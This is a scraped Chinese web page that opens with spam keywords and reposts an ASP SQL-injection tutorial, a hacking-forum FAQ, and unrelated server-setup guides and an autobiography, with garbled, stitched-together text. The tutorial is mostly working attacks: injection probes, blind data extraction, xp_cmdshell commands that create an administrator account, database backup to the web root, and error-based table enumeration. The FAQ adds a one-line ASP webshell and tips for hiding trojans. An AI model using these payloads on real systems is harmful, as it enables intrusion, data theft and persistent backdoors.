网站建设丶金手指a排名15,黄骅市属于哪里,淮南矿业集团廉政建设网站,开发公司法人和项目负责人质量安全责任制度SQL注入天书 - ASP注入漏洞全接触 SQL注入天书 - ASP注入漏洞全接触作者:NB联盟#xff0d;小竹 (QQ:48814) 引 言 随着B/S模式应用开发的发展#xff0c;使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高#xff0c;程序员的水平及经验也参差…SQL注入天书 - ASP注入漏洞全接触
SQL注入天书 - ASP注入漏洞全接触作者:NB联盟小竹 (QQ:48814) 引 言 随着B/S模式应用开发的发展使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高程序员的水平及经验也参差不齐相当大一部分程序员在编写代码的时候没有对用户输入数据的合法性进行判断使应用程序存在安全隐患。用户可以提交一段数据库查询代码根据程序返回的结果获得某些他想得知的数据这就是所谓的SQL Injection即注入。 注入是从正常的WWW端口访问而且表面看起来跟一般的Web页面访问没什么区别所以目前市面的防火墙都不会对注入发出警报如果管理员没查看IIS日志的习惯可能被入侵很长时间都不会发觉。 但是注入的手法相当灵活在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析构造巧妙的SQL语句从而成功获取想要的数据是高手与“菜鸟”的根本区别。 根据国情国内的网站用ASPAccess或SQLServer的占70%以上PHPMySQ占L20%其他的不足10%。在本文我们从分入门、进阶至高级讲解一下ASP注入的方法及技巧PHP注入的文章由NB联盟的另一位朋友zwell撰写希望对安全工作者和程序员都有用处。了解ASP注入的朋友也请不要跳过入门篇因为部分人对注入的基本判断方法还存在误区。大家准备好了吗Lets Go... 入 门 篇 如果你以前没试过注入的话那么第一步先把IE菜单工具Internet选项高级显示友好 HTTP 错误信息前面的勾去掉。否则不论服务器返回什么错误IE都只显示为HTTP 500服务器错误不能获得更多的提示信息。 第一节、注入原理 以下我们从一个网站 www.19cn.com开始注本文发表前已征得该站站长同意大部分都是真实数据。 在网站首页上有名为“IE不能打开新窗口的多种解决方法”的链接地址为 http://www.19cn.com/showdetail.asp?id49我们在这个地址后面加上单引号’服务器会返回下面的错误提示 Microsoft JET Database Engine 错误 80040e14 字符串的语法错误 在查询表达式 ID49 中。 /showdetail.asp行8 从这个错误提示我们能看出下面几点 1. 网站使用的是Access数据库通过JET引擎连接数据库而不是通过ODBC。 2. 程序没有判断客户端提交的数据是否符合程序要求。 3. 该SQL语句所查询的表中有一名为ID的字段。 从上面的例子我们可以知道注入的原理就是从客户端提交特殊的代码从而收集程序及服务器的信息从而获取你想到得到的资料。 第二节、判断能否进行注入 看完第一节有一些人会觉得我也是经常这样测试能否注入的这不是很简单吗 其实这并不是最好的方法为什么呢 首先不一定每台服务器的IIS都返回具体错误提示给客户端如果程序中加了cint(参数)之类语句的话注入是不会成功的但服务器同样会报错具体提示信息为处理 URL 时服务器上出错。请和系统管理员联络。 其次部分对注入有一点了解的程序员认为只要把单引号过滤掉就安全了这种情况不为少数如果你用单引号测试是测不到注入点的 那么什么样的测试方法才是比较准确呢答案如下 ① http://www.19cn.com/showdetail.asp?id49 ② http://www.19cn.com/showdetail.asp?id49 and 11 ③ http://www.19cn.com/showdetail.asp?id49 and 12 这就是经典的11、12测试法了怎么判断呢看看上面三个网址返回的结果就知道了 可以注入的表现 ① 正常显示这是必然的不然就是程序有错误了 ② 正常显示内容基本与①相同 ③ 提示BOF或EOF程序没做任何判断时、或提示找不到记录判断了rs.eof时、或显示内容为空程序加了on error resume next 不可以注入就比较容易判断了①同样正常显示②和③一般都会有程序定义的错误提示或提示类型转换时出错。 当然这只是传入参数是数字型的时候用的判断方法实际应用的时候会有字符型和搜索型参数我将在中级篇的“注入一般步骤”再做分析。 第三节、判断数据库类型及注入方法 不同的数据库的函数、注入方法都是有差异的所以在注入之前我们还要判断一下数据库的类型。一般ASP最常搭配的数据库是Access和SQLServer网上超过99%的网站都是其中之一。 怎么让程序告诉你它使用的什么数据库呢来看看 SQLServer有一些系统变量如果服务器IIS提示没关闭并且SQLServer返回错误提示的话那可以直接从出错信息获取方法如下 http://www.19cn.com/showdetail.asp?id49 and user0 这句语句很简单但却包含了SQLServer特有注入方法的精髓我自己也是在一次无意的测试中发现这种效率极高的猜解方法。让我看来看看它的含义首先前面的语句是正常的重点在and user0我们知道user是SQLServer的一个内置变量它的值是当前连接的用户名类型为nvarchar。拿一个nvarchar的值跟int的数0比较系统会先试图将nvarchar的值转成int型当然转的过程中肯定会出错SQLServer的出错提示是将nvarchar值 ”abc” 转换数据类型为 int 的列时发生语法错误呵呵abc正是变量user的值这样不废吹灰之力就拿到了数据库的用户名。在以后的篇幅里大家会看到很多用这种方法的语句。 顺便说几句众所周知SQLServer的用户sa是个等同Adminstrators权限的角色拿到了sa权限几乎肯定可以拿到主机的Administrator了。上面的方法可以很方便的测试出是否是用sa登录要注意的是如果是sa登录提示是将”dbo”转换成int的列发生错误而不是”sa”。 如果服务器IIS不允许返回错误提示那怎么判断数据库类型呢我们可以从Access和SQLServer和区别入手Access和SQLServer都有自己的系统表比如存放数据库中所有对象的表Access是在系统表[msysobjects]中但在Web环境下读该表会提示“没有权限”SQLServer是在表[sysobjects]中在Web环境下可正常读取。 在确认可以注入的情况下使用下面的语句 http://www.19cn.com/showdetail.asp?id49 and (select count(*) from sysobjects)0 http://www.19cn.com/showdetail.asp?id49 and (select count(*) from msysobjects)0 如果数据库是SQLServer那么第一个网址的页面与原页面 http://www.19cn.com/showdetail.asp?id49是大致相同的而第二个网址由于找不到表msysobjects会提示出错就算程序有容错处理页面也与原页面完全不同。 如果数据库用的是Access那么情况就有所不同第一个网址的页面与原页面完全不同第二个网址则视乎数据库设置是否允许读该系统表一般来说是不允许的所以与原网址也是完全不同。大多数情况下用第一个网址就可以得知系统所用的数据库类型第二个网址只作为开启IIS错误提示时的验证。 进 阶 篇 在入门篇我们学会了注入的判断方法但真正要拿到网站的保密内容是远远不够的。接下来我们就继续学习如何从数据库中获取想要获得的内容首先我们先看看注入的一般步骤 第一节、注入的一般步骤 首先判断环境寻找注入点判断数据库类型这在入门篇已经讲过了。 其次根据注入参数类型在脑海中重构SQL语句的原貌按参数类型主要分为下面三种 (A) ID49 这类注入的参数是数字型SQL语句原貌大致如下 Select * from 表名 where 字段49 注入的参数为ID49 And [查询条件]即是生成语句 Select * from 表名 where 字段49 And [查询条件] (B) Class连续剧 这类注入的参数是字符型SQL语句原貌大致概如下 Select * from 表名 where 字段’连续剧’ 注入的参数为Class连续剧’ and [查询条件] and ‘’’ 即是生成语句 Select * from 表名 where 字段’连续剧’ and [查询条件] and ‘’’’ (C) 搜索时没过滤参数的如keyword关键字SQL语句原貌大致如下 Select * from 表名 where 字段like ’%关键字%’ 注入的参数为keyword’ and [查询条件] and ‘%25’’ 即是生成语句 Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’’%’ 接着将查询条件替换成SQL语句猜解表名例如 ID49 And (Select Count(*) from Admin)0 如果页面就与ID49的相同说明附加条件成立即表Admin存在反之即不存在请牢记这种方法。如此循环直至猜到表名为止。 表名猜出来后将Count(*)替换成Count(字段名)用同样的原理猜解字段名。 有人会说这里有一些偶然的成分如果表名起得很复杂没规律的那根本就没得玩下去了。说得很对这世界根本就不存在100%成功的黑客技术苍蝇不叮无缝的蛋无论多技术多高深的黑客都是因为别人的程序写得不严密或使用者保密意识不够才有得下手。 有点跑题了话说回来对于SQLServer的库还是有办法让程序告诉我们表名及字段名的我们在高级篇中会做介绍。 最后在表名和列名猜解成功后再使用SQL语句得出字段的值下面介绍一种最常用的方法Ascii逐字解码法虽然这种方法速度很慢但肯定是可行的方法。 我们举个例子已知表Admin中存在username字段首先我们取第一条记录测试长度 http://www.19cn.com/showdetail.asp?id49 and (select top 1 len(username) from Admin)0 先说明原理如果top 1的username长度大于0则条件成立接着就是1、2、3这样测试下去一直到条件不成立为止比如7成立8不成立就是len(username)8 当然没人会笨得从0,1,2,3一个个测试怎么样才比较快就看各自发挥了。在得到username的长度后用mid(username,N,1)截取第N位字符再asc(mid(username,N,1))得到ASCII码比如 id49 and (select top 1 asc(mid(username,1,1)) from Admin)0 同样也是用逐步缩小范围的方法得到第1位字符的ASCII码注意的是英文和数字的ASCII码在1-128之间可以用折半法加速猜解如果写成程序测试效率会有极大的提高。 第二节、注入常用函数 有SQL语言基础的人在注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自己的SQL水平特别是一些常用的函数及命令。 Accessasc(字符) SQLServerunicode(字符) 作用返回某字符的ASCII码 Accesschr(数字) SQLServernchar(数字) 作用与asc相反根据ASCII码返回字符 Accessmid(字符串,N,L) SQLServersubstring(字符串,N,L) 作用返回字符串从N个字符起长度为L的子字符串即N到NL之间的字符串 Accessabc(数字) SQLServerabc (数字) 作用返回数字的绝对值在猜解汉字的时候会用到 AccessA between B And C SQLServerA between B And C 作用判断A是否界于B与C之间 第三节、中文处理方法 在注入中碰到中文字符是常有的事有些人一碰到中文字符就想打退堂鼓了。其实只要对中文的编码有所了解“中文恐惧症”很快可以克服。 先说一点常识 Access中中文的ASCII码可能会出现负数取出该负数后用abs()取绝对值汉字字符不变。 SQLServer中中文的ASCII为正数但由于是UNICODE的双位编码不能用函数ascii()取得ASCII码必须用函数unicode ()返回unicode值再用nchar函数取得对应的中文字符。 了解了上面的两点后是不是觉得中文猜解其实也跟英文差不多呢除了使用的函数要注意、猜解范围大一点外方法是没什么两样的。 高 级 篇 看完入门篇和进阶篇后稍加练习破解一般的网站是没问题了。但如果碰到表名列名猜不到或程序作者过滤了一些特殊字符怎么提高注入的成功率怎么样提高猜解效率请大家接着往下看高级篇。 第一节、利用系统表注入SQLServer数据库 SQLServer是一个功能强大的数据库系统与操作系统也有紧密的联系这给开发者带来了很大的方便但另一方面也为注入者提供了一个跳板我们先来看看几个具体的例子 ① http://Site/url.asp?id1;exec master..xp_cmdshell “net user name password /add”-- 分号;在SQLServer中表示隔开前后两句语句--表示后面的语句为注释所以这句语句在SQLServer中将被分成两句执行先是Select出ID1的记录然后执行存储过程xp_cmdshell这个存储过程用于调用系统命令于是用net命令新建了用户名为name、密码为password的windows的帐号接着 ② http://Site/url.asp?id1;exec master..xp_cmdshell “net localgroup name administrators /add”-- 将新建的帐号name加入管理员组不用两分钟你已经拿到了系统最高权限当然这种方法只适用于用sa连接数据库的情况否则是没有权限调用xp_cmdshell的。 ③ http://Site/url.asp?id1 and db_name()0 前面有个类似的例子and user0作用是获取连接用户名db_name()是另一个系统变量返回的是连接的数据库名。 ④ http://Site/url.asp?id1;backup database 数据库名 to disk’c:\inetpub\wwwroot\1.db’;-- 这是相当狠的一招从③拿到的数据库名加上某些IIS出错暴露出的绝对路径将数据库备份到Web目录下面再用HTTP把整个数据库就完完整整的下载回来所有的管理员及用户密码都一览无遗在不知道绝对路径的时候还可以备份到网络地址的方法如\\202.96.xx.xx\Share\1.db但成功率不高。 ⑤ http://Site/url.asp?id1 and (Select Top 1 name from sysobjects where xtype’U’ and status0)0 前面说过sysobjects是SQLServer的系统表存储着所有的表名、视图、约束及其它对象xtype’U’ and status0表示用户建立的表名上面的语句将第一个表名取出与0比较大小让报错信息把表名暴露出来。第二、第三个表名怎么获取还是留给我们聪明的读者思考吧。 ⑥ http://Site/url.asp?id1 and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)0 从⑤拿到表名后用object_id(‘表名’)获取表名对应的内部IDcol_name(表名ID,1)代表该表的第1个字段名将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。 以上6点是我研究SQLServer注入半年多以来的心血结晶可以看出对SQLServer的了解程度直接影响着成功率及猜解速度。在我研究SQLServer注入之后我在开发方面的水平也得到很大的提高呵呵也许安全与开发本来就是相辅相成的吧。 第二节、绕过程序限制继续注入 在入门篇提到有很多人喜欢用’号测试注入漏洞所以也有很多人用过滤’号的方法来“防止”注入漏洞这也许能挡住一些入门者的攻击但对注入比较熟悉的人还是可以利用相关的函数达到绕过程序限制的目的。 在“注入的一般步骤”一节中我所用的语句都是经过我优化让其不包含有单引号的在“利用系统表注入SQLServer数据库”中有些语句包含有’号我们举个例子来看看怎么改造这些语句 简单的如where xtype’U’字符U对应的ASCII码是85所以可以用where xtypechar(85)代替如果字符是中文的比如where name’用户’可以用where namenchar(29992)nchar(25143)代替。 第三节、经验小结 1.有些人会过滤Select、Update、Delete这些关键字但偏偏忘记区分大小写所以大家可以用select这样尝试一下。 2.在猜不到字段名时不妨看看网站上的登录表单一般为了方便起见字段名都与表单的输入框取相同的名字。 3.特别注意地址栏的号传入程序后解释为空格%2B解释为号%25解释为%号具体可以参考URLEncode的相关介绍。 4.用Get方法注入时IIS会记录你所有的提交字符串对Post方法做则不记录所以能用Post的网址尽量不用Get。 5. 猜解Access时只能用Ascii逐字解码法SQLServer也可以用这种方法只需要两者之间的区别即可但是如果能用SQLServer的报错信息把值暴露出来那效率和准确率会有极大的提高。 防 范 方 法 注入漏洞可谓是“千里之堤溃于蚁穴”这种漏洞在网上极为普遍通常是由于程序员对注入不了解或者程序过滤不严格或者某个参数忘记检查导致。在这里我给大家一个函数代替ASP中的Request函数可以对一切的SQL注入Say NO函数如下 Function SafeRequest(ParaName,ParaType) --- 传入参数 --- ParaName:参数名称-字符型 ParaType:参数类型-数字型(1表示以上参数是数字0表示以上参数为字符) Dim ParaValue ParaValueRequest(ParaName) If ParaType1 then If not isNumeric(ParaValue) then Response.write 参数 ParaName 必须为数字型 Response.end End if Else ParaValuereplace(ParaValue,,) End if SafeRequestParaValue End function 文章到这里就结束了不管你是安全人员、技术爱好者还是程序员我都希望本文能对你有所帮助。如果有什么疑问或想与我讨论相关问题欢迎到 www.54NB.com向提出谢谢大家 -------------------------------------------------------------------------------- 说明:使用NBSI-NB联盟SQL注入分析器可以检测出各种SQL注入漏洞并进行解码,提高猜解效率. 版权:本文是我的原创连载文章,首发于 www.54NB.com,欢迎各网站转载,请务必保留版权信息,媒体杂志转载前请先与本人联系. ----------------------------------------------------------------------- 本版FAQ及新手必读,新来的朋友请先看看 1.NBSI不是万能的,别指望NBSI能帮你猜解100%的站,甚至连手工猜解不出的都要NBSI去猜解.如果NBSI能猜解出来而手工猜解不了的,只是说明你的注入还没入门 2.不要把这里当成找黑客黑网站的地方,自己在尝试过程中有什么问题尽管提出,注意写清楚详细情况,注入是一项需要判断很多环境的技术. 3.不要试图把网址摆出来让别人从头到尾教你,也不要试图问一个几页纸都回答不完的问题,以后例如这个网站怎么黑啊怎么得到WebShell之类的贴子我将直接删除. 4.不要发短讯让我帮你黑站,这是不可能的事,别浪费彼此的时间. 5.不要发表UP顶之类的贴子,如果你觉得文章写得好,说出自己觉得好在哪里,而不是一味的顶贴. 6.发贴前最好先看看下面的下面常见问题解答,以免给人拍砖: (1)问什么叫SQL注入 答 http://nb.unionbyte.com/View.asp?PostID1457033 (2)问这种情况能不能注入 Microsoft VBScript 运行时错误 错误 800a000d 类型不匹配: Clng (或类型不匹配: CInt) 答参数已经做了过滤,虽然不是很友好,但也是不能注入的了。 (3)问得到网站后台管理权限后有没有方法在网站上上传木马用什么办法 答找可以上传东西的地方看能不能上传asp木马。 SQLSERVER的必须得到绝对路径,然后可以用NBWS等工具生成. (4)问这个MD5(如ab2a34fdf3fd232)怎么破? 答目前MD5只能是暴力破解请不要叫其他人破。自己去下载工具去破。工具在这里 http://nb.unionbyte.com/View.asp?PostID1457924 (5)问防止sql注入的好方法 答分别从数字字符搜索防止。详细防止看小竹写的这个函数 Function SafeRequest(ParaName,ParaType) --- 传入参数 --- ParaName:参数名称-字符型 ParaType:参数类型-数字型(1表示以上参数是数字0表示以上参数为字符) Dim ParaValue ParaValueRequest(ParaName) If ParaType1 then If not isNumeric(ParaValue) then Response.write 参数 ParaName 必须为数字型 Response.end End if Else ParaValuereplace(ParaValue,,) End if SafeRequestParaValue End function (6)问木马上传后怎么样才更隐蔽 答从管理员角度去想问题你可以写进他不常用的文件里面。不常看常改的文件里面是比较安全的。或者写一句话木马%if request(x) then execute request(x)% (7)问我得到了字符的unicode码以后但是我不知道如何把它还原成字符啊。 答SQLSERVER的nchar或VB的chrw都可以还原 (8)问下载了数据库但找不到后台 答找后台没有捷径继续找或尝试另外的思路。 ____________________________________________________ 动网7.0与win2003配置问题 作者未知 来源未知 加入时间2004-6-21 论坛用一段时间 论坛就无法打开了 但是其他WEB网页都可以 郁闷了 每次打不开 都需要把IIS重启才可以访问 感谢 xfxp 告诉我 以下是他的回答 我按照修改配置后问题已经解决 Re动网7.0和IIS有冲突 我在2003里面关闭了RPC出错执行重启和IIS错误调试就完全正常了现在和2000一样好用还有那个SQL数据库的远程连接如果没有必要就关了吧有时也会引起RPC错误 Re动网7.0和IIS有冲突 服务里面的Remote Procedure Call (RPC)默认是出错重新启动改为不执行 还有一个是IIS里面的IS5.0出错调试什么的关掉就行了 另外最好装上JAVA虚拟机WIN2003不自带的 Re动网7.0和IIS有冲突 将 IIS 配置为 IIS 5.0 隔离模式 在“IIS 管理器”中展开本地计算机右键单击“网站”然后单击“属性”。 单击“服务”选项卡选中“以 IIS 5.0 隔离模式运行 WWW 服务”复选框然后单击“确定”。 ______________________________________________________ win2K下配置aspcgiphpmysql全攻略 作者未知 来源未知 加入时间2004-6-21 Indexing Service, FrontPage 2000 Server Extensions, Internet Service Manager (HTML) 这几个别装还有其它的一些总之不用的都别装。 (根据安全原则最少的服务最小的权限最大的安全。) 首先打开internet管理器开始--程序--管理--Internet服务管理 如果照上面所安装的里面有一个默认站点和一个smtp的服务项 选默认站点删除其下面的所有目录。(按你键盘上的delete键) 停掉iis最简单的方法开始--运行--打入net stop iisadmin 选择Y回车 (启动的命令是net start w3svc) 把C盘的Inetpub目录彻底删掉(停掉iis后才能删)在其它盘新建一个目录 在IIS管理器中将默认站点的主目录指向刚才新建的目录 如果你需要什么权限的目录可以自己慢慢建需要什么权限开什么。 (特别注意写权限和执行程序的权限没有绝对的必要千万不要给默认是没给的所以你不用研究呵呵..) 应用程序配置在IIS管理器中删除必须之外的任何无用映射 留下ASP, ASA和其他你确实需要用到的文件类型(除了cgi,php其它的我想你都没用删除htw, htr, idq, ida……) 不知道在哪删吗方法打开Internet服务管理-选择站点-属性-WWW服务-编辑-主目录-配置-应用程序映射 然后就开始一个个删吧没有全选的真麻烦。 接着在刚刚那个窗口的应用程序调试书签内将脚本错误消息改为发送文本 除非你想ASP出错的时候用户知道你的程序/网络/数据库结构错误文本写什么 随便你喜欢自己看着办。点击确定退出时别忘了让虚拟目录继承你设定的属性。 为了对付日益增多的cgi漏洞扫描器还有一个小技巧可以参考 在IIS中将HTTP404 Object Not Found出错页面通过URL重定向到一个定制HTM文件 可以让目前绝大多数CGI漏洞扫描器失灵。其实原因很简单 大多数CGI扫描器在编写时为了方便都是通过查看返回页面的HTTP代码来判断漏洞是否存在的 例如著名的IDQ漏洞一般都是通过取1.idq来检验如果返回HTTP200就认为是有这个漏洞 反之如果返回HTTP404就认为没有如果你通过URL将HTTP404出错信息重定向到HTTP404.htm文件 那么所有的扫描无论存不存在漏洞都会返回HTTP20090%的CGI扫描器会认为你什么漏洞都有 结果反而掩盖了你真正的漏洞让入侵者茫然无处下手不过从个人角度来说 我还是认为扎扎实实做好安全设置比这样的小技巧重要的多。 Win2000的账号安全是另一个重点首先Win2000的默认安装允许任何用户通过空用户得到系统所有账号/共享列表 这个本来是为了方便局域网用户共享文件的但是一个远程用户也可以得到你的用户列表并使用暴力法破解用户密码。 很多朋友都知道可以通过更改注册表Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 1来禁止139空连接 实际上win2000的本地安全策略如果是域服务器就是在域服务器安全和域安全策略中就有这样的选项RestrictAnonymous匿名连接的额外限制 这个选项有三个值 0None. Rely on default permissions无取决于默认的权限 1Do not allow enumeration of SAM accounts and shares不允许枚举SAM帐号和共享 2No access without explicit anonymous permissions没有显式匿名权限就不允许访问 0这个值是系统默认的什么限制都没有远程用户可以知道你机器上所有的账号、组信息、共享目录、网络传输列表(NetServerTransportEnum等等对服务器来说这样的设置非常危险。 1这个值是只允许非NULL用户存取SAM账号信息和共享信息。 2这个值是在win2000中才支持的需要注意的是如果你一旦使用了这个值你的共享估计就全部完蛋了所以我推荐你还是设为1比较好。 好了入侵者现在没有办法拿到我们的用户列表我们的账户安全了……慢着至少还有一个账户是可以跑密码的这就是系统内建的administrator怎么办我改改改在计算机管理-用户账号中右击administrator然后改名改成什么随便你只要能记得就行了。 改了超管理用户名后在Terminal Service的登录界面还是可以看到的(你登录过就自已记住啦) 修改方法 运行regedit找到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\winlogon 项中的Dont Display Last User Name串数据改成1这样系统不会自动显示上次的登录用户名。 为了安全你还可以打开TCP/IP筛选桌面上右击网上邻居-属性-右击你要配置的网卡-属性-TCP/IP-高级-选项-TCP/IP过滤 这里有三个过滤器分别为TCP端口、UDP端口和IP协议 TCP端口点击只允许然后在下面加上你需要开的端口一般来说WEB服务器只需要开80(www) FTP服务器需要开20(FTP Data)21(FTP Control)3306(Mysql)3389(远程终端控制,如果你的主机托管在别人机房里,不能直接操作,就需要这个) 邮件服务器可能需要打开25(SMTP),110(POP3)我对端口没研究但如果照本文所提供的服务你只要开以上几个就行了。(8020212533063389) --cgi支持 下载activeperl (可到 www.perl.com下载最新版) 1、解压运行install.exe默认是安装在 C:\PERL 下不过为了方便请最好安装到 C:\USR 目录下(这样写 Perl 解释器的路径就可以直接用 #!/usr/bin/perl 了可以保持单机环境和网络环境路径一致。 安装时一路按Y即可。) 2、安装好后按照下面三步来修改注册表 运行 RegEdit搜寻: HKEY_LOCAL_MACHINE\System\Currentcontrlset\Services\W3svc\Parameters\scriptMap\ 键名, 然后增加键名.cgi键值C:\USR\BIN\perl.exe %s %s 和键名.pl键值C:\USR\BIN\perl.exe %s %s 不懂得建那么在右边的框内---点右键---新建--字符串值 名称改为.cgi,双击该键即可输入数值数据也就是上面说的键值 因为要让这台主机支持php所以顺便在这里添加上php和php3的支持以后新建站点时可省事 增加键名.php键值C:\php\php.exe %s %s 增加键名.php3键值C:\php\php.exe %s %s OK重启后即生效cgi支持搞定!以后新建站点后在应用程序配置里面默认就会加上php和cgi的支持(不给这个权限的话删掉就是了)。 cgi支持搞定! --mysql支持 下载mysql (可到 www.mysql.com下载最新版本) 1、解压运行setup.exe完全安装默认安装路径为:c:\mysql 2、安装完成后打开“开始”按钮中的“运行”输入命令C:\mysql\bin\mysqld-nt.exe --install并执行? 3、开始--程序--管理工具--服务--找到mysql--启动它 4、mysql安装完成重启win2000 5、重启后打开C:\mysql\bin\winmysqladmin.exe在第一次用它时需要建立管理员名及密码分别设置用户名和密码设定后系统托盘会出现一个“红绿灯”的小图标(以后系统启动时均会自动加载)。 6、OKmysql支持搞定! --php支持 下载PHP (可到 www.php.com下载最新版本) 1、将 php 4.0.4 解压到 c:\php 2、将PHP目录内的 php.ini-dist 文件拷贝到WinNT目录内改名为 php.ini (这是php的配置文件无需更改即可运行我没仔细研究) 3、根据需要修改 php.ini 文件内容如要使用 session 功能请建立 c:\tmp 目录并将 php.ini 文档内 session.save_path 的值设置成为绝对路径c:/tmp 4、将PHP目录内的 Php4ts.dll 文件复制到 WinNt\System32 目录内 5、在控制面板中的管理工具里启动“Internet 服务管理器”IIS 6、打开站点属性在 ISAPI 筛选器选项中, 增加新的筛选器用 PHP 作为筛选器名称,在“可执行文件”栏中填入php4isapi.dll及其路径 (c:\php\sapi\php4isapi.dll)。 7、在属性的文档选项中启用默认文档加入index.php ___________________________________________________ 动网7.0 sp2惊现大漏洞请用户注意 作者未知 来源未知 加入时间2004-5-19 近日国内使用者众多的动网论坛惊现漏洞请各站长注意并关注动网官方及时打补。 目前解决方法 关闭用户上传功能。 删除或改名论坛目录下reg_upload.asp及upfile.asp两个文件。 该漏洞危害程序很高请站长们高度重视密切关注动网官方。 官方补丁已出请用户下载更新 http://www.luntan.com.cn/soft/2386.htm _____________________________________ Sql Injection ---sql 注射 infiltrate 渗透 _________________________________________________________________________ 有一些朋友对网页技术的知识了解不是很多对一些名词常常混淆。下面总结一下 1、Java、JavaScript和JScript。 首先这三者没有必然的联系它们是完全不同的事物它们是分别由不同公司开发的在函数方面有相同的地方也有很多不同之处。Java是由Sun公司创立、开发JavaScript则是Sun和Netscape公司共同开发的产品JScript是微软对ECMA262语言规范的一种实现。这三者的共同点是语法与C语言相似。JS是JavaScript的简称。 JScript应用于ASP运行于服务器端。而Java、JavaScript都是运行于客户端。Sun公司后来又推出了JSP以Java语言为基础运行于服务器端。运行于服务器端的网页是动态网页所以以JScript为基础的ASP、以Java为基础的JSP是动态网页而Java、JavaScript则是静态网页。 2、静态网页、动态网页。 程序是否在服务器端运行是重要标志。在服务器端运行的程序、网页、组件属于动态网页它们会随不同客户、不同时间返回不同的网页例如ASP、PHP、JSP、ASP.net、CGI等。运行于客户端的程序、网页、插件、组件属于静态网页例如html页、Flash、JavaScript、VBScript等等它们是永远不变的。 3、VB和VBScript。 有少部分朋友把VBSCript称为VB这是错误的。VB是Visual Basic的简称应用于软件开发。VBScript是Microsoft Visual Basic Scripting Edition的简称应用于客户端Web页或者服务器端ASP页(ASP语言以VBScript或JScript为基础)。VB和VBScript共同点是语法、函数相同由微软开发。 通常VBScript简称为VBS。可惜现在一些网页病毒就是使用VBSCript脚本。 ________________________________________________________________ [自传]程序人生十一年 程序写得累了也写篇自传来自娱自乐一下吧。 第一次接触电脑是93年三四月间老爸花了四千多块钱买了台386SX 25然后就逼着我学五笔只能靠打文章练习而不是像现在的小孩一样上QQ泡MM练习那时候觉得电脑真是个很枯燥的东西完全没想到今天会靠写程序谋生。 搞了半年多才基本学会了DOS的一些基础知识DOS只能用640K的基本内存所以经常为了多争取几K的内存花一大堆时间去写CONFIG.SYS就这样反复的装系统配置系统一年后我终于成了一个DOS高手。 DOS玩得没东西可以玩了就开始看编程的书BASIC功能太少C和汇编又看不太懂只有那个Foxbase不太难又比较好玩的可能注定我对数据库是比较有天份的吧学了一两年就可以写一些小型的数据库管理系统了。 在学电脑之前我就有玩玩股票了后来家里买了个股票接收器接上有线电视在家就可以看到实时的行情不久电视台对发送的讯息要月费我把接收的文件收下来一看原来是DBF格式的只改了个扩展名于是马上开工研究股票分析系统的存储格式。那时候没有网络身边的人都没几个会电脑的一切只能靠自己在那时就养成了什么问题都自己动脑解决的习惯。通过一个星期的不断的换算研究摸清楚了那个股票分析系统的存储格式再用两三天的时间一个转换程序就出炉了一个月可以省起60-80块钱的台费哈。运行了一段时间情况良好后来居然这个系统还卖出了两三套虽然只有几百块足够我开心一阵子了。 98年开始上网交了两个月长途话费终于学会跟人在BBS上飙信也就是现在大家说的灌水那时候上网的人很少不过网上的人都很纯真。那段时间认识了很多高手包括现在的腾讯老总马化腾说到PonyMa我真的很佩服他五年前他拿着炒股赚到的70万开创了腾讯谁都没想到能发展到今天这个阶段他的魄力实在是我们望尘莫及的。 高考后顺利升上广工开始学做网页学了一点PHOTOSHOPFRONTPAGE觉得自己还是不适合做这些感性的东西还是编程比较适合我由于打算学CGI刚要学的时候同学告诉我微软出了种叫ASP的语句好象比CGI好很多于是就转学ASP由于以前写过两三年程序了加上上网找资料方便多了一个星期左右就写出个计数器一个月就可以写留言本之类简单的东西了。当然现在看来那时候的代码写得是很幼稚的。 大学四年真正学到的东西不多不过数据库和管理信息系统的知识却对我现在的道路起着很大的作用由于之前写过不少的数据库应用程序所以书本的东西我很快就能应用到实际中来而不象大多数同学一样考完试就还给老师了。所以学院有什么网站或项目要做都会找我去帮拖帮老师做项目有两个好处因为老师做的系统都是全部按规范化的流程设计的可以学到不少东西另一方面就是不怕考试不及格呵呵这在很多学校都是心照不宣的秘密。 正因为这样毕业的时候找工作也很顺利进了第一家公司觉得一切都跟以前想象的大不相同不管你多有能力公司都不需要你做到最好而是要你效率最高在第一家公司做了一年能学到的东西已经越来越少了于是换了个工作环境进了一家做ERP开发的公司待遇还可以而且公司的高手也挺多。不过ERP开发确实是个很费脑力的工作整个系统有600多个表、9700个字段25个模块两千多项功能到现在一年多了解的还不到一半。 在这公司工作也不会很忙所以经常可以跟网上的人聊聊天交流一下技术。去年在动网闲逛因为一个贴跟starlove和fcuandy吵得不可开交不过不打不相识我发现他们都是挺好相处的人而且跟我一样都是对技术非常执着的人后来又认识了5945、Jadesun、纯生、酷酷、国哥这些人大家都聊得很投机就组织了个灌水公司也就是现在的NB联盟。 NB成立以前期都处在松散式的组织状况灌灌水聊聊技术直到后来跟动网的管理员起了摩擦才想起何必帮别人打广告还要受人气呢我们可以利用自己的技术优势把联盟商业化。经过一段时间的摸索NB的产品已经一个个开始推出了联盟的论坛人气也越来越高。相信有一天动网的人会发现他们亲手造就了一个强大的竞争对手。 花了这么长篇幅介绍NB也许是因为我觉得NB是我现在和未来的希望是我引以为傲的寄托。 流水帐就先记到这里路还很长没人能预料未来的事但每个人都会希望明天会更精采我也不例外。 ____________________________________________________ 本版FAQ及新手必读,新来的朋友请先看看 1.NBSI不是万能的,别指望NBSI能帮你猜解100%的站,甚至连手工猜解不出的都要NBSI去猜解.如果NBSI能猜解出来而手工猜解不了的,只是说明你的注入还没入门 2.不要把这里当成找黑客黑网站的地方,自己在尝试过程中有什么问题尽管提出,注意写清楚详细情况,注入是一项需要判断很多环境的技术. 3.不要试图把网址摆出来让别人从头到尾教你,也不要试图问一个几页纸都回答不完的问题,以后例如这个网站怎么黑啊怎么得到WebShell之类的贴子我将直接删除. 4.不要发短讯让我帮你黑站,这是不可能的事,别浪费彼此的时间. 5.不要发表UP顶之类的贴子,如果你觉得文章写得好,说出自己觉得好在哪里,而不是一味的顶贴. 6.发贴前最好先看看下面的下面常见问题解答,以免给人拍砖: (1)问什么叫SQL注入 答 